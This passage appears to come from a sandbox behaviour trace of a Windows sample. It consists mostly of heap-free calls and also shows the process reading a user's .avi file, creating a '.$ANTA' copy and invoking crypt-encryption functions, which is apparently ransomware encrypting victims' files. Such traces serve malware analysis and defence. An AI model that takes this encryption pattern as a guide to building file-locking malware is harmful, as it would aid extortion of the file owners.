HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0133.954] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0133.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0133.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0133.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0133.957] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0133.957] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0133.957] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0133.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0133.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\M9-n.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\m9-n.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0133.958] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.958] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0133.958] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0133.958] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0133.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e478 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a558 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0133.959] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0133.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0133.959] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\M9-n.avi.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\m9-n.avi.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.213] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0134.213] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.216] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0134.216] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0xb5e4, lpOverlapped=0x0) returned 1 [0134.218] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0134.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0134.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0134.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b8f020 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0134.221] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.221] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.221] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0134.222] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0134.222] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0134.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0134.223] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.223] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 